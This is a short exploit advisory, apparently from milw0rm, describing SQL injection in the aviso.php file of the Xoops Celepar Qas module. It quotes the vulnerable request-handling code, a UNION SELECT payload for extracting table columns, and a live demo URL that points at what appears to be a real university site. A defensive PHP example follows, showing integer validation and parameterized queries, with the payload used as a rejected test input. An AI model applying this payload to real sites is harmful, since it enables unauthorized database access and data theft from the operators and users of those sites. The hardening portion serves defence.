**********************************************************************************************************
Xoops Celepar Module Qas
Download of Xoops Celepar: http://www.xoops.pr.gov.br/uploads/core/xoopscelepar.tar.gz
Author: s4r4d0
mail: s4r4d0@yahoo.com
**********************************************************************************************************

An SQL injection has been found in the Qas module of Xoops Celepar, in the file Aviso.php.

Source code (the codigo parameter is read directly from the request):

    }
    $codigo = $_POST['codigo'];
    } else
    $codigo = $_GET['codigo'];

***********************************************************************************************************
Target: site.com.br/modules/qas/aviso.php?codigo=

Sql Code: -1+UNION+SELECT+1,2,columnname,4,5,6,7,8+from+tablename

Demo: http://www.dce.uem.br/modules/qas/aviso.php?codigo=-1+UNION+SELECT+1,2,3,4,5,6,7,8--
***********************************************************************************************************
[ Fatal Error Group Br ]
[Greetz: to Elemento_pcx - m4v3rick - w4nt3d - DD3str0yer - M0nt3r - Vympel]
[From Brazil]
************************************************************************************************************

# milw0rm.com [2009-07-24]
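The excerpt above copies `codigo` from `$_POST` or `$_GET` without any validation. The following added example (not code from the advisory or from Xoops Celepar) shows one way to harden that step: the value is accepted only if it is a positive integer, and it is bound as a parameter instead of being concatenated into SQL. The functions `read_codigo` and `fetch_aviso`, the table `qas_aviso` with its columns, and the in-memory SQLite database are assumptions made for illustration, since the advisory does not show the module's query.

```php
<?php
// Added example: hardened handling of the `codigo` parameter.
// Function names, table/column names and the SQLite database are hypothetical.

// Read codigo the way the excerpt does (POST first, then GET),
// but accept it only if it is a positive integer.
function read_codigo(array $post, array $get): ?int
{
    $raw = $post['codigo'] ?? $get['codigo'] ?? null;
    if (!is_string($raw)) {
        return null; // missing, or an array such as codigo[]=1
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Look the record up with a bound integer parameter, never string concatenation.
function fetch_aviso(PDO $db, int $codigo): ?array
{
    $stmt = $db->prepare('SELECT codigo, titulo, texto FROM qas_aviso WHERE codigo = :codigo');
    $stmt->bindValue(':codigo', $codigo, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed test data so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE qas_aviso (codigo INTEGER PRIMARY KEY, titulo TEXT, texto TEXT)');
$db->exec("INSERT INTO qas_aviso VALUES (1, 'Aviso 1', 'constructed sample row')");

// Constructed inputs: one legitimate id, the advisory's UNION string
// (with "+" decoded to spaces, as PHP does for query strings), and two malformed values.
$samples = ['1', '-1 UNION SELECT 1,2,3,4,5,6,7,8--', '1 OR 1=1', ''];
foreach ($samples as $value) {
    $codigo = read_codigo([], ['codigo' => $value]);
    if ($codigo === null) {
        echo 'rejected: ' . var_export($value, true) . "\n";
        continue;
    }
    $row = fetch_aviso($db, $codigo);
    echo "accepted {$codigo}: " . ($row ? $row['titulo'] : 'not found') . "\n";
}
```

Rejected values should produce an HTTP 400 response and a log entry, which also gives defenders a signal for probing against `aviso.php`.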